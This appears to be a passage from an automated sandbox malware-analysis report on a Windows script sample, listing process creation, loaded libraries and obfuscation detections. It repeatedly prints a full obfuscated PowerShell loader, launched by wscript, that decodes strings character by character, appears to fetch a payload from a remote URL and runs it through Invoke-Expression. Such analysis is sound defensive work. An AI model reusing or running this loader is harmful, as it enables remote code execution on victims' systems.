ploutCl imaAgerd%Tis.y\S,adspSyndia ccenrCompaa ,tond rndbeBio,erS,cari kottnYuckegToxiceBlok rKhasanFerieeSekse.AdderSProcttCabb ePortu Unpro& Asso& Calf SteneGemysc Eva h Kro oHardd resse$St.ep ';Gdedes (Tabellariske 'spiro$Rea.cgMytholovertoL gnebHyperaArmodlArres:Arb.jRKrtegoTeknosOprems PulveSemibl Corrl.ibleifarmanRat fi CavosHand,=Verek(UdstacEutopmSubcodgulvm Noti / Terrc abel Dupli$BrainSTertiu ovolDrbyseHenlevBrsspl Gyptlsouthi FundnInterg Stil)Justi ');Gdedes (Tabellariske 'Appea$MahargGodmol nteroA,klebMusicaConfelYd rp:Poss,eProc,kDukkesK.ffepB.lene Teatr BalatBespalWhirriS.cren PinciHethie ensn .nre=,picl$avlsdVThougo,heumlelen,oKvad wTopch1Weeke5Infer9Defer.billasBefarpCecidlTekniiManu.tLeuco(Hjem $,orplBAloeraIncapaHa slnNaiandKollev SemivScoa.)Permi ');$Volow159=$ekspertlinien[0];Gdedes (Tabellariske 'Macro$ SkrmgBushwlAdelsoAmfetbHvsnia BlodlNapol:FormesLovemo.ommal.ocioo Car.sM.onspHieroiAfrunlFemk s Serp= C emN Vej eCrompwAnger-Sta.lOSmigrb DeltjIndisefarvecEnougtLin,e eng,SCiselyF.ttos Bar,tHori eAntismFe,ul.CanceNForlgeBemantchlor.CesarWInstreDakenb CephC Menfl AstriTandbePerfen Sup tStopp ');Gdedes (Tabellariske 'Forre$F,rgas PredoImagelI,iotoGammes r,bepAccidiAnkyllOverasPyrom. P nkHgoldbeSmrreaFrygtdKul.ieS.brarsrbehs Ho o[Pr,co$SquifTKloake C.ibmMacroppaakre Ove.sKalcitPreacuHft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\paraderingerne.Ste && echo $"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\PING.EXE ping google.com -n 1 Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\PING.EXE ping %.%.%.% Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Memoirer = 1;$Pennefjerene245='Substrin';$Pennefjerene245+='g';Function Tabellariske($Assessorerne57){$Dekorationernendmarcherne110=$Assessorerne57.Length-$Memoirer;For($Dekorationerne=5; $Dekorationerne -lt $Dekorationernendmarcherne110; $Dekorationerne+=(6)){$Egebark130+=$Assessorerne57.$Pennefjerene245.Invoke($Dekorationerne, $Memoirer);}$Egebark130;}function Gdedes($Ondograph){. ($Parkin) ($Ondograph);}$Frieri=Tabellariske 'ForarMChimeoSexopzEmceiipiepolMyt.olBundtaNaiad/ H gh5 C,it.Af.en0Drost Nabog(EmissWC mplibve.sn ,ynadInsnao Connw L,cosEf.er BrugsNNonalT utb Sind1 roer0Paros.Balka0B,dri;.rama TsarWD sbei,enitn N gl6borts4energ;Fulda HistixTauri6 m da4Kotur; S is DietarRallyvVeri,:Frems1P eli2Condy1zinco.Falte0Eksam) Str. OminsGEmbedesaccucmakkek Ev noAfgjo/My.op2penci0Malmh1 U,fe0Forew0Prste1Syntr0St.ve1Fremm BilfFGo.hii futurBookse T.ecfNonc,oBebudxSe io/Burd.1Color2Ibrug1 Kniv.tel f0 Indu ';$Tempestuous=Tabellariske ',olarUmak,osBlokaeU nigrGodst-SuperA Spl,gUneleenarcin Salgtj,bga ';$Volow159=Tabellariske 'cab.ahGeno.tShirttPediapNedis:Fac.n/ Post/ PeaicFurazrStuddyKidnapDipletaktivo .inecApotehAquilrColanoJomfrnDeveliA,axicForudl Afpae tchbsUrteh.Inte.i YeddoPebfl/Trai mB.comgnon xbF.ssioadult1 Past/Mo.phNBerneoNytten Un riL.gnenLjsersEsdratArbejrS.steuSve,dm Bride,onzanIndkotW,undaHyinglA onilOptniyBlaaj. KeypqQuarrxVelgrd,adde ';$Baandvv=Tabellariske 'Dolme>Skots ';$Parkin=Tabellariske 'PassiiElapie VicexOps.g ';$Sulevlling = Tabellariske 'Cu che BreacOrdenhBeordoWald Si e%Ska.ra Fly.pNyh,dpSlumpdd.mmea ploutCl imaAgerd%Tis.y\S,adspSyndia ccenrCompaa ,tond rndbeBio,erS,cari kottnYuckegToxiceBlok rKhasanFerieeSekse.AdderSProcttCabb ePortu Unpro& Asso& Calf SteneGemysc Eva h Kro oHardd resse$St.ep ';Gdedes (Tabellariske 'spiro$Rea.cgMytholovertoL gnebHyperaArmodlArres:Arb.jRKrtegoTeknosOprems PulveSemibl Corrl.ibleifarmanRat fi CavosHand,=Verek(UdstacEutopmSubcodgulvm Noti / Terrc abel Dupli$BrainSTertiu ovolDrbyseHenlevBrsspl Gyptlsouthi FundnInterg Stil)Justi ');Gdedes (Tabellariske 'Appea$MahargGodmol nteroA,klebMusicaConfelYd rp:Poss,eProc,kDukkesK.ffepB.lene Teatr BalatBespalWhirriS.cren PinciHethie ensn .nre=,picl$avlsdVThougo,heumlelen,oKvad wTopch1Weeke5Infer9Defer.billasBefarpCecidlTekniiManu.tLeuco(Hjem $,orplBAloeraIncapaHa slnNaiandKollev SemivScoa.)Permi ');$Volow159=$ekspertlinien[0];Gdedes (Tabellariske 'Macro$ SkrmgBushwlAdelsoAmfetbHvsnia BlodlNapol:FormesLovemo.ommal.ocioo Car.sM.onspHieroiAfrunlFemk s Serp= C emN Vej eCrompwAnger-Sta.lOSmigrb DeltjIndisefarvecEnougtLin,e eng,SCiselyF.ttos Bar,tHori eAntismFe,ul.CanceNForlgeBemantchlor.CesarWInstreDakenb CephC Menfl AstriTandbePerfen Sup tStopp ');Gdedes (Tabellariske 'Forre$F,rgas PredoImagelI,iotoGammes r,bepAccidiAnkyllOverasPyrom. P nkHgoldbeSmrreaFrygtdKul.ieS.brarsrbehs Ho o[Pr,co$SquifTKloake C.ibmMacroppaakre Ove.sKalcitPreacuHft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\paraderingerne.Ste && echo $" Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptnet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: ore.pdb source: powershell.exe, 00000008.00000002.2521948578.000002106EE9A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbJS source: powershell.exe, 00000008.00000002.2521948578.000002106EE9A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbGE source: powershell.exe, 00000008.00000002.2518113345.000002106CD64000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb[ source: powershell.exe, 00000008.00000002.2520628764.000002106EBF4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000008.00000002.2521948578.000002106EE9A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.2521948578.000002106EE60000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdbR source: powershell.exe, 00000008.00000002.2520628764.000002106EBF4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: embly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbdllh source: powershell.exe, 00000008.00000002.2520628764.000002106EBF4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ore.pdbk source: powershell.exe, 00000008.00000002.2521948578.000002106EE9A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.pdb source: powershell.exe, 00000008.00000002.2518113345.000002106CD64000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000008.00000002.2521948578.000002106EE9A000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("POWERSHELL "$Memoirer = 1;$Pennefjerene245='Substrin';$Pennefjerene245+='g';Function Tabellariske($Assessorerne57", "0")
Suspicious powershell command line found
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Memoirer = 1;$Pennefjerene245='Substrin';$Pennefjerene245+='g';Function Tabellariske($Assessorerne57){$Dekorationernendmarcherne110=$Assessorerne57.Length-$Memoirer;For($Dekorationerne=5; $Dekorationerne -lt $Dekorationernendmarcherne110; $Dekorationerne+=(6)){$Egebark130+=$Assessorerne57.$Pennefjerene245.Invoke($Dekorationerne, $Memoirer);}$Egebark130;}function Gdedes($Ondograph){. ($Parkin) ($Ondograph);}$Frieri=Tabellariske 'ForarMChimeoSexopzEmceiipiepolMyt.olBundtaNaiad/ H gh5 C,it.Af.en0Drost Nabog(EmissWC mplibve.sn ,ynadInsnao Connw L,cosEf.er BrugsNNonalT utb Sind1 roer0Paros.Balka0B,dri;.rama TsarWD sbei,enitn N gl6borts4energ;Fulda HistixTauri6 m da4Kotur; S is DietarRallyvVeri,:Frems1P eli2Condy1zinco.Falte0Eksam) Str. OminsGEmbedesaccucmakkek Ev noAfgjo/My.op2penci0Malmh1 U,fe0Forew0Prste1Syntr0St.ve1Fremm BilfFGo.hii futurBookse T.ecfNonc,oBebudxSe io/Burd.1Color2Ibrug1 Kniv.tel f0 Indu ';$Tempestuous=Tabellariske ',olarUmak,osBlokaeU nigrGodst-SuperA Spl,gUneleenarcin Salgtj,bga ';$Volow159=Tabellariske 'cab.ahGeno.tShirttPediapNedis:Fac.n/ Post/ PeaicFurazrStuddyKidnapDipletaktivo .inecApotehAquilrColanoJomfrnDeveliA,axicForudl Afpae tchbsUrteh.Inte.i YeddoPebfl/Trai mB.comgnon xbF.ssioadult1 Past/Mo.phNBerneoNytten Un riL.gnenLjsersEsdratArbejrS.steuSve,dm Bride,onzanIndkotW,undaHyinglA onilOptniyBlaaj. KeypqQuarrxVelgrd,adde ';$Baandvv=Tabellariske 'Dolme>Skots ';$Parkin=Tabellariske 'PassiiElapie VicexOps.g ';$Sulevlling = Tabellariske 'Cu che BreacOrdenhBeordoWald Si e%Ska.ra Fly.pNyh,dpSlumpdd.mmea ploutCl imaAgerd%Tis.y\S,adspSyndia ccenrCompaa ,tond rndbeBio,erS,cari kottnYuckegToxiceBlok rKhasanFerieeSekse.AdderSProcttCabb ePortu Unpro& Asso& Calf SteneGemysc Eva h Kro oHardd resse$St.ep ';Gdedes (Tabellariske 'spiro$Rea.cgMytholovertoL gnebHyperaArmodlArres:Arb.jRKrtegoTeknosOprems PulveSemibl Corrl.ibleifarmanRat fi CavosHand,=Verek(UdstacEutopmSubcodgulvm Noti / Terrc abel Dupli$BrainSTertiu ovolDrbyseHenlevBrsspl Gyptlsouthi FundnInterg Stil)Justi ');Gdedes (Tabellariske 'Appea$MahargGodmol nteroA,klebMusicaConfelYd rp:Poss,eProc,kDukkesK.ffepB.lene Teatr BalatBespalWhirriS.cren PinciHethie ensn .nre=,picl$avlsdVThougo,heumlelen,oKvad wTopch1Weeke5Infer9Defer.billasBefarpCecidlTekniiManu.tLeuco(Hjem $,orplBAloeraIncapaHa slnNaiandKollev SemivScoa.)Permi ');$Volow159=$ekspertlinien[0];Gdedes (Tabellariske 'Macro$ SkrmgBushwlAdelsoAmfetbHvsnia BlodlNapol:FormesLovemo.ommal.ocioo Car.sM.onspHieroiAfrunlFemk s Serp= C emN Vej eCrompwAnger-Sta.lOSmigrb DeltjIndisefarvecEnougtLin,e eng,SCiselyF.ttos Bar,tHori eAntismFe,ul.CanceNForlgeBemantchlor.CesarWInstreDakenb CephC Menfl AstriTandbePerfen Sup tStopp ');Gdedes (Tabellariske 'Forre$F,rgas PredoImagelI,iotoGammes r,bepAccidiAnkyllOverasPyrom. P nkHgoldbeSmrreaFrygtdKul.ieS.brarsrbehs Ho o[Pr,co$SquifTKloake C.ibmMacroppaakre Ove.sKalcitPreacuHft
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Memoirer = 1;$Pennefjerene245='Substrin';$Pennefjerene245+='g';Function Tabellariske($Assessorerne57){$Dekorationernendmarcherne110=$Assessorerne57.Length-$Memoirer;For($Dekorationerne=5; $Dekorationerne -lt $Dekorationernendmarcherne110; $Dekorationerne+=(6)){$Egebark130+=$Assessorerne57.$Pennefjerene245.Invoke($Dekorationerne, $Memoirer);}$Egebark130;}function Gdedes($Ondograph){. ($Parkin) ($Ondograph);}$Frieri=Tabellariske 'ForarMChimeoSexopzEmceiipiepolMyt.olBundtaNaiad/ H gh5 C,it.Af.en0Drost Nabog(EmissWC mplibve.sn ,ynadInsnao Connw L,cosEf.er BrugsNNonalT utb Sind1 roer0Paros.Balka0B,dri;.rama TsarWD sbei,enitn N gl6borts4energ;Fulda HistixTauri6 m da4Kotur; S is DietarRallyvVeri,:Frems1P eli2Condy1zinco.Falte0Eksam) Str. OminsGEmbedesaccucmakkek Ev noAfgjo/My.op2penci0Malmh1 U,fe0Forew0Prste1Syntr0St.ve1Fremm BilfFGo.hii futurBookse T.ecfNonc,oBebudxSe io/Burd.1Color2Ibrug1 Kniv.tel f0 Indu ';$Tempestuous=Tabellariske ',olarUmak,osBlokaeU nigrGodst-SuperA Spl,gUneleenarcin Salgtj,bga ';$Volow159=Tabellariske 'cab.ahGeno.tShirttPediapNedis:Fac.n/ Post/ PeaicFurazrStuddyKidnapDipletaktivo .inecApotehAquilrColanoJomfrnDeveliA,axicForudl Afpae tchbsUrteh.Inte.i YeddoPebfl/Trai mB.comgnon xbF.ssioadult1 Past/Mo.phNBerneoNytten Un riL.gnenLjsersEsdratArbejrS.steuSve,dm Bride,onzanIndkotW,undaHyinglA onilOptniyBlaaj. KeypqQuarrxVelgrd,adde ';$Baandvv=Tabellariske 'Dolme>Skots ';$Parkin=Tabellariske 'PassiiElapie VicexOps.g ';$Sulevlling = Tabellariske 'Cu che BreacOrdenhBeordoWald Si e%Ska.ra Fly.pNyh,dpSlumpdd.mmea ploutCl imaAgerd%Tis.y\S,adspSyndia ccenrCompaa ,tond rndbeBio,erS,cari kottnYuckegToxiceBlok rKhasanFerieeSekse.AdderSProcttCabb ePortu Unpro& Asso& Calf SteneGemysc Eva h Kro oHardd resse$St.ep ';Gdedes (Tabellariske 'spiro$Rea.cgMytholovertoL gnebHyperaArmodlArres:Arb.jRKrtegoTeknosOprems PulveSemibl Corrl.ibleifarmanRat fi CavosHand,=Verek(UdstacEutopmSubcodgulvm Noti / Terrc abel Dupli$BrainSTertiu ovolDrbyseHenlevBrsspl Gyptlsouthi FundnInterg Stil)Justi ');Gdedes (Tabellariske 'Appea$MahargGodmol nteroA,klebMusicaConfelYd rp:Poss,eProc,kDukkesK.ffepB.lene Teatr BalatBespalWhirriS.cren PinciHethie ensn .nre=,picl$avlsdVThougo,heumlelen,oKvad wTopch1Weeke5Infer9Defer.billasBefarpCecidlTekniiManu.tLeuco(Hjem $,orplBAloeraIncapaHa slnNaiandKollev SemivScoa.)Permi ');$Volow159=$ekspertlinien[0];Gdedes (Tabellariske 'Macro$ SkrmgBushwlAdelsoAmfetbHvsnia BlodlNapol:FormesLovemo.ommal.ocioo Car.sM.onspHieroiAfrunlFemk s Serp= C emN Vej eCrompwAnger-Sta.lOSmigrb DeltjIndisefarvecEnougtLin,e eng,SCiselyF.ttos Bar,tHori eAntismFe,ul.CanceNForlgeBemantchlor.CesarWInstreDakenb CephC Menfl AstriTandbePerfen Sup tStopp ');Gdedes (Tabellariske 'Forre$F,rgas PredoImagelI,iotoGammes r,bepAccidiAnkyllOverasPyrom. P nkHgoldbeSmrreaFrygtdKul.ieS.brarsrbehs Ho o[Pr,co$SquifTKloake C.ibmMacroppaakre Ove.sKalcitPreacuHft Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFAACCD0953 push E95B7BD0h; ret 8_2_00007FFAACCD09C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFAACCD7523 push ebx; iretd 8_2_00007FFAACCD756A
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
